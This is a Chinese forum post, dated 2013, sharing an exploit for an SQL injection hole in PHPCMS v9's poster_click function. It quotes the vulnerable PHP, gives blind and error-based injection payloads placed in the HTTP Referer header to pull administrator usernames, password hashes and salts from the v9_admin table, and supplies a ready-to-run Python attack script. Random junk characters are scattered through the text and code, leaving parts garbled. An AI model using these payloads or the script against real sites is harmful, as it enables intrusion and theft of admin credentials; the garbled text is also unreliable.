有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:2 a& w2 |2 P, s* q
- N! o! e* ~; L3 L
问题函数\phpcms\modules\poster\index.php2 I+ X6 u. }0 `1 h0 b* O- [
1 ?) }4 P `9 j& B
public function poster_click() {. {, y( s* c4 J) H4 v' {' t9 l
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
( ^) w, ~7 U: I$r = $this->db->get_one(array('id'=>$id));
2 Z2 I# v9 o2 @: D* l# Kif (!is_array($r) && empty($r)) return false;
0 f% `( h3 V6 `1 Y' j$ip_area = pc_base::load_sys_class('ip_area');
# {6 B4 s1 @7 E& B8 u$ip = ip();, ?( e; f8 f8 x' u
$area = $ip_area->get($ip);
4 ^5 M9 d5 T4 r: ^% _$username = param::get_cookie('username') ? param::get_cookie('username') : '';
) B% U; r4 V7 C, m# ~% gif($id) {* q3 ?8 y' L* z( O: ]
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();, h& p* w$ X0 z3 T8 j
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
: z6 j. C3 N( F' O% C7 M}. d! d. l" ^* b7 e& ?% Y
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
" b# r2 w+ d, f+ N$setting = string2array($r['setting']);9 P3 p8 m) i9 j9 `2 s
if (count($setting)==1) {& C" Z" a h9 A" q' R
$url = $setting['1']['linkurl'];5 F- d! W+ D& W7 x9 C2 f
} else {
8 o- e: k4 d. B$ o, s6 G2 h$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
+ F- m6 e& `+ f& E}* q4 u: Z/ q" {5 }& c
header('Location: '.$url);
0 f2 A% j3 [5 N# O7 y; A5 L1 H! M1 l}& C3 s. ]: R/ y; q+ W5 q
( E# s% o9 t7 k/ u8 }2 z / i$ }5 K1 D2 s$ n1 u+ i
7 m$ c2 z. d5 u4 F+ T- y P1 K m利用方式:5 z2 ?! ?# H! O( R' g; W
. F1 i# B' i$ m6 L" O* l1、可以采用盲注入的手法:2 q6 {5 k1 _) a* _1 D" p2 |: |
0 K2 `& d: C$ D8 }. L Lreferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#( o5 E8 D H: y4 Q4 u; g( ]
7 Z$ e5 w' f! u, [3 K; u t通过返回页面,正常与否一个个猜解密码字段。% P& d& _. M' F
2 ?, w3 ^8 g' y3 [0 J# ]1 o: W
2、代码是花开写的,随手附上了:
: g: E8 i/ y$ y& j4 T5 J) w! K1 Q/ X. F& n8 X% z7 K
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
6 S$ ^6 t, J2 L' K* q4 D, g' B" m0 W$ m) S6 \1 o6 |
此方法是爆错注入手法,原理自查。' b/ ?* @0 y( x; T
4 l5 W' ^2 s$ [8 i
* `3 L; `/ C/ l% C+ G$ G0 a7 w/ o! W" k' C8 K
利用程序:
7 B. v3 }4 E4 e0 ^0 P. a' I, Z3 H" h: d4 r: c5 m+ W
#!/usr/bin/env python
8 y: n, |, ^* k9 cimport httplib,sys,re- G* s- _# x" ~1 ]
# i2 j! Q! o9 m u) H( Jdef attack():" n. k! o' E# [0 B$ V( x) n- v1 @" A
print “Code by Pax.Mac Team conqu3r!”
+ n2 j4 X0 f) R* z; r9 K6 f( K: iprint “Welcome to our zone!!!”
- \3 Q: U) a6 T4 u- purl=sys.argv[1]
t9 d( @* V% r8 \paths=sys.argv[2]
6 [ l' o1 S. q) i' {0 X2 p9 n1 {: jconn = httplib.HTTPConnection(url)
" |* p, I5 S0 i$ F* f1 S" D2 _i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,3 C2 P# k. t* r' @6 {$ M+ H
“Accept”: “text/plain”,& V6 j; `0 a0 o) F7 @
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}8 a3 |) l* H9 i+ I
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
% }9 S' ?+ i0 q% zr1 = conn.getresponse()+ B0 u6 I; O# \. c- ?
datas=r1.read()* Z/ [* q$ L: k9 l' W4 D9 z, n
datas=re.findall(r”Duplicate entry \’\w+’”, datas)
- G2 {2 `, r& L5 d6 U' Kprint datas[0]
- W1 `# q$ Z, K9 L. m2 ?9 E# oconn.close()5 g0 U: \& c/ ]' v, w4 A5 @, \5 t2 ]9 J
if __name__==”__main__”:
" I% p# y2 i- K7 ~- M1 iif len(sys.argv)<3:% X2 g2 R* S7 T c. F: }% f& K. ]
print “Code by Pax.Mac Team conqu3r”
" @" R N4 x- c0 F" z; rprint “Usgae:”: P0 I8 r8 i8 A# D" b
print “ phpcmsattack.py www.paxmac.org /”
# e; z3 h! [5 H2 u4 N! sprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
# `# U* T$ k" N4 o9 Asys.exit(1)# K0 i% H' x! p7 @; M
attack()
; L, E1 z0 ^) p) L% c P) @! ~8 P1 r0 Q
|
发表于 2013-1-11 21:01:00
收藏
支持
反对